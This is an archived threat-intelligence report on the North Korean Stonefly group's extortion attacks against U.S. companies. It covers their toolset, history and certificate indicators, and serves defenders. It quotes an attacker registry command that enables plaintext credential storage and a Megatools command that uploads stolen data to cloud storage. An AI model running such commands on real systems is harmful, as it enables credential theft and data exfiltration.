{ "id": "aa2027da-c5a3-4090-a396-60256fd92188", "created_at": "2026-04-06T00:11:47.739815Z", "updated_at": "2026-04-10T03:34:54.42768Z", "deleted_at": null, "sha1_hash": "83ff54e4aff9baaf784d2c76111733343ff81c68", "title": "Stonefly: Extortion Attacks Continue Against U.S. Targets", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 66284, "plain_text": "Stonefly: Extortion Attacks Continue Against U.S. Targets\r\nBy About the Author\r\nArchived: 2026-04-05 21:19:10 UTC\r\nSymantec’s Threat Hunter Team has found evidence that the North Korean Stonefly group (aka Andariel, APT45,\r\nSilent Chollima, Onyx Sleet) is continuing to mount financially motivated attacks against organizations in the\r\nU.S., despite being the subject of an indictment and a multi-million dollar reward.\r\nSymantec, part of Broadcom, found evidence of intrusions against three different organizations in the U.S. in\r\nAugust of this year, a month after the indictment was published. While the attackers didn’t succeed in deploying\r\nransomware on the networks of any of the organizations affected, it is likely that the attacks were financially\r\nmotivated. All the victims were private companies and involved in businesses with no obvious intelligence value. \r\nAttribution\r\nIn several of the attacks, Stonefly’s custom malware Backdoor.Preft (aka Dtrack, Valefor) was deployed. This tool\r\nis exclusively associated with the group. In addition to this, several Stonefly indicators of compromise recently\r\ndocumented by Microsoft were found on the compromised networks. The attackers used a fake Tableau certificate\r\ndocumented by Microsoft in addition to two other certificates (see Indicators of Compromise) that appear to be\r\nunique to this campaign. \r\nToolset\r\nPreft: Multi-stage backdoor capable of downloading and uploading files, executing commands, and downloading\r\nadditional plugins. Preft can support multiple plugin types, including executable files, VBS, BAT, and shellcode. It\r\nhas multiple persistence modes, including Startup_LNK, Service, Registry, and Task Scheduler. \r\nNukebot: Backdoor capable of executing commands, downloading and uploading files, and taking screenshots.\r\nNukebot has not been associated with Stonefly before; however, its source code was leaked and this is likely how\r\nStonefly obtained the tool.\r\nBatch files: The attackers used a malicious batch file to enable plaintext credentials, modifying the registry to\r\nadd:\r\nHKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG_DWORD /d\r\n1\r\nMimikatz (see below) was then executed to dump credentials.\r\nMimikatz: Publicly available credential dumping tool. The attackers used a custom variant of the tool that writes\r\nharvested credentials to the file C:\\Windows\\Temp\\KB0722.log. A similar custom variant of Mimikatz found on\r\nVirusTotal was linked by Mandiant to Stonefly.\r\nhttps://www.security.com/threat-intelligence/stonefly-north-korea-extortion\r\nPage 1 of 4\n\nKeyloggers: The attackers deployed two distinct keyloggers in their attacks: \r\nThe first (SHA256: 485465f38582377f9496a6c77262670a313d8c6e01fd29a5dbd919b9a40e68d5) was a\r\nkeylogger capable of stealing data from the clipboard. In addition to this, it logs when a program starts and\r\ncaptures which program’s keystrokes are input. Data captured is logged in a file named 0.log, which is\r\narchived into a ZIP archive named as a TMP file in the temporary directory with the password\r\nPass@w0rd#384.\r\nThe second (SHA256: d867aaa627389c377a29f01493e9dff517f30db8441bf2ccc8f80c48eaa0bf91) was a\r\nkeylogger capable of stealing data from the clipboard. It logs stolen data into a randomly named DAT file\r\nin the temporary directory. \r\nSliver: Open-source cross-platform penetration testing framework.\r\nChisel: Open-source proxy tool. It creates a TCP/UDP tunnel that is transported over HTTP and secured via SSH.\r\nPuTTY: Publicly available SSH client.\r\nPlink: A command-line connection tool for PuTTY\r\nMegatools: A command line client for the Mega.nz cloud storage service. Megatools was used to perform data\r\nexfiltration:\r\nCSIDL_WINDOWS\\temp\\mt.exe put -u [REMOVED] -p [REMOVED] CSIDL_WINDOWS\\temp\\sig.rar /Root  \r\nSnap2HTML: Publicly available tool that takes snapshots of folder structures on a hard drive and saves them as\r\nHTML files.\r\nFastReverseProxy (FRP): Open-sourced tool to expose local servers to the public internet.\r\nBackground\r\nOn July 25, 2024, the U.S. Justice Department indicted a North Korean man named Rim Jong Hyok on charges\r\nrelated to the attack campaign. Rim is alleged to be a member of the Stonefly group, which is linked to the North\r\nKorean military intelligence agency, the Reconnaissance General Bureau (RGB). \r\nHe was charged with being involved in extorting U.S. hospitals and other healthcare providers between 2021 and\r\n2023, laundering the ransom proceeds, and then using these proceeds to fund additional cyberattacks against\r\ntargets in the defense, technology, and government sectors worldwide. Targets of these follow-on attacks included\r\ntwo U.S. Air Force bases, NASA-OIG, and organizations located in Taiwan, South Korea, and China. In addition\r\nto the indictment, the U.S. Department of State offered a reward of up to $10 million for information on his\r\nlocation or identification.\r\nStonefly first came to notice in July 2009, when it mounted distributed denial-of-service (DDoS) attacks against a\r\nnumber of South Korean, U.S. government, and financial websites.\r\nIt reappeared again in 2011, when it launched more DDoS attacks, but also revealed an espionage element to its\r\nattacks when it was found to be using a sophisticated backdoor Trojan (Backdoor.Prioxer) against selected targets.\r\nhttps://www.security.com/threat-intelligence/stonefly-north-korea-extortion\r\nPage 2 of 4\n\nIn March 2013, the group was linked to the Jokra (Tojan.Jokra) disk-wiping attacks against a number of South\r\nKorean banks and broadcasters. Three months later, the group was involved in a string of DDoS attacks against\r\nSouth Korean government websites.\r\nIn recent years, the group’s capabilities have grown markedly and, since at least 2019, Symantec has seen its focus\r\nshift mainly to espionage operations against select, high-value targets. It appears to specialize in targeting\r\norganizations that hold classified or highly sensitive information or intellectual property. While other North\r\nKorean groups are well known for mounting financial attacks driven by the need to raise foreign currency for the\r\nregime, Stonefly had until recent years appeared not to be involved in financially motivated attacks. \r\nUndeterred\r\nWhile Stonefly’s move into financially motivated attacks is a relatively recent development, the spotlight shone on\r\nthe group’s activities due to the indictment naming one of its members has not yet led to a cessation of activity.\r\nThe group is likely continuing to attempt to mount extortion attacks against organizations in the U.S.\r\nProtection/Mitigation\r\nFor the latest protection updates, please visit the Symantec Protection Bulletin.\r\nCertificate 1\r\nthumbprint = \"313cffaac3d1576ca3c1cee8f9a68a15a24ff418\"\r\nissuer = \"/CN=Baramundi Inc.\"\r\nsubject = \"/CN=Baramundi Inc.\"\r\nversion = 3\r\nalgorithm = \"sha1WithRSA\"\r\nalgorithm_oid = \"1.3.14.3.2.29\"\r\nserial = \"af:6d:f9:f9:69:86:58:80:49:1e:2b:ae:20:9f:0d:12\"\r\nnot_before = 1683852503\r\nnot_after = 2208988799\r\nverified = 1\r\ndigest_alg = \"sha1\"\r\ndigest = \"efe03d9be2cd148594e5fcb7272a40b85e33d2bf\"\r\nfile_digest = \"efe03d9be2cd148594e5fcb7272a40b85e33d2bf\"\r\nnumber_of_certificates = 1\r\nCertificate 2\r\nthumbprint = \"10b8b939400a59d2cb79fff735796d484394f8dd\"\r\nissuer = \"/CN=VEXIS SOFTWARE LTD.\"\r\nsubject = \"/CN=VEXIS SOFTWARE LTD.\"\r\nversion = 3\r\nalgorithm = \"sha1WithRSA\"\r\nalgorithm_oid = \"1.3.14.3.2.29\"\r\nhttps://www.security.com/threat-intelligence/stonefly-north-korea-extortion\r\nPage 3 of 4\n\nserial = \"bc:bf:05:4e:a8:b2:69:be:4c:c9:04:f0:8d:f9:eb:97\"\r\nnot_before = 1710348691\r\nnot_after = 2208988799\r\nverified = 1\r\ndigest_alg = \"sha1\"\r\ndigest = \"b9b5d20438cf54acf33ee5731dc283554b8a044c\"\r\nfile_digest = \"b9b5d20438cf54acf33ee5731dc283554b8a044c\"\r\nnumber_of_certificates = 1\r\nSource: https://www.security.com/threat-intelligence/stonefly-north-korea-extortion\r\nhttps://www.security.com/threat-intelligence/stonefly-north-korea-extortion\r\nPage 4 of 4", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "references": [ "https://www.security.com/threat-intelligence/stonefly-north-korea-extortion" ], "report_names": [ "stonefly-north-korea-extortion" ], "threat_actors": [ { "id": "838f6ced-12a4-4893-991a-36d231d96efd", "created_at": "2022-10-25T15:50:23.347455Z", "updated_at": "2026-04-10T02:00:05.295717Z", "deleted_at": null, "main_name": "Andariel", "aliases": [ "Andariel", "Silent Chollima", "PLUTONIUM", "Onyx Sleet" ], "source_name": "MITRE:Andariel", "tools": [ "Rifdoor", "gh0st RAT" ], "source_id": "MITRE", "reports": null }, { "id": "110e7160-a8cc-4a66-8550-f19f7d418117", "created_at": "2023-01-06T13:46:38.427592Z", "updated_at": "2026-04-10T02:00:02.969896Z", "deleted_at": null, "main_name": "Silent Chollima", "aliases": [ "Onyx Sleet", "PLUTONIUM", "OperationTroy", "Guardian of Peace", "GOP", "WHOis Team", "Andariel", "Subgroup: Andariel" ], "source_name": "MISPGALAXY:Silent Chollima", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "88bd3777-de28-4ed2-a994-e38275333256", "created_at": "2024-07-28T02:00:04.697991Z", "updated_at": "2026-04-10T02:00:03.683368Z", "deleted_at": null, "main_name": "APT45", "aliases": [], "source_name": "MISPGALAXY:APT45", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "bc6e3644-3249-44f3-a277-354b7966dd1b", "created_at": "2022-10-25T16:07:23.760559Z", "updated_at": "2026-04-10T02:00:04.741239Z", "deleted_at": null, "main_name": "Andariel", "aliases": [ "APT 45", "Andariel", "G0138", "Jumpy Pisces", "Onyx Sleet", "Operation BLACKMINE", "Operation BLACKSHEEP/Phase 3.", "Operation Blacksmith", "Operation DESERTWOLF/Phase 3", "Operation GHOSTRAT", "Operation GoldenAxe", "Operation INITROY/Phase 1", "Operation INITROY/Phase 2", "Operation Mayday", "Operation VANXATM", "Operation XEDA", "Plutonium", "Silent Chollima", "Stonefly" ], "source_name": "ETDA:Andariel", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "a2b92056-9378-4749-926b-7e10c4500dac", "created_at": "2023-01-06T13:46:38.430595Z", "updated_at": "2026-04-10T02:00:02.971571Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Operation DarkSeoul", "Bureau 121", "Group 77", "APT38", "NICKEL GLADSTONE", "G0082", "COPERNICIUM", "Moonstone Sleet", "Operation GhostSecret", "APT 38", "Appleworm", "Unit 121", "ATK3", "G0032", "ATK117", "NewRomanic Cyber Army Team", "Nickel Academy", "Sapphire Sleet", "Lazarus group", "Hastati Group", "Subgroup: Bluenoroff", "Operation Troy", "Black Artemis", "Dark Seoul", "Andariel", "Labyrinth Chollima", "Operation AppleJeus", "COVELLITE", "Citrine Sleet", "DEV-0139", "DEV-1222", "Hidden Cobra", "Bluenoroff", "Stardust Chollima", "Whois Hacking Team", "Diamond Sleet", "TA404", "BeagleBoyz", "APT-C-26" ], "source_name": "MISPGALAXY:Lazarus Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "771d9263-076e-4b6e-bd58-92b6555eb739", "created_at": "2025-08-07T02:03:25.092436Z", "updated_at": "2026-04-10T02:00:03.758541Z", "deleted_at": null, "main_name": "NICKEL HYATT", "aliases": [ "APT45 ", "Andariel", "Dark Seoul", "Jumpy Pisces ", "Onyx Sleet ", "RIFLE Campaign", "Silent Chollima ", "Stonefly ", "UN614 " ], "source_name": "Secureworks:NICKEL HYATT", "tools": [ "ActiveX 0-day", "DTrack", "HazyLoad", "HotCriossant", "Rifle", "UnitBot", "Valefor" ], "source_id": "Secureworks", "reports": null } ], "ts_created_at": 1775434307, "ts_updated_at": 1775792094, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/83ff54e4aff9baaf784d2c76111733343ff81c68.pdf", "text": "https://archive.orkl.eu/83ff54e4aff9baaf784d2c76111733343ff81c68.txt", "img": "https://archive.orkl.eu/83ff54e4aff9baaf784d2c76111733343ff81c68.jpg" } }